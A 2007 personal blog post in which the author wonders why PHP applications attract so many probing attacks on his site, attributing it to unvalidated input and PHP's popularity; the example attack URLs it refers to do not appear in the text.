Feigning normality since 1973
PHP and Security Holes
Filed in: Website Management.
Watch out - I'm about to make myself sound like a snob. :)
What is it about PHP that spawns applications with security holes? My site gets hit a lot by people/bots probing for security holes, and said hack attempts exclusively include "php" somewhere in the URL. Witness a smattering of hack attempts that have occurred recently:
As an aside, even an idiot could see that last URL wouldn't work. Evidently the tool used to probe it was written by a chimp. But I digress.
What's with all the security holes in PHP apps? Is it just that PHP is so popular for web development that it has the same problem as Windows (the majority use it, so hacks are more common)? Of course, all of the URLs there have something in common - they obviously count on the application in question using input from the end user without validating it first. Is there something in PHP which tends to encourage this sort of thing, or just that it's so widely used that it attracts more lazy programming?
Of course, both Wordpress and Movable Type (both applications which I use on this site) have had security holes - one uses PHP, the other uses Perl, and both are written to a very high standard. Both are also widely used, which suggests to me that PHP is a victim of its own success. Like Windows, they're so common that any security holes are highly sought after by hackers.
That said, I'd be extremely hesitant about installing any other PHP applications here...
Posted June 25, 2007 8:34 PM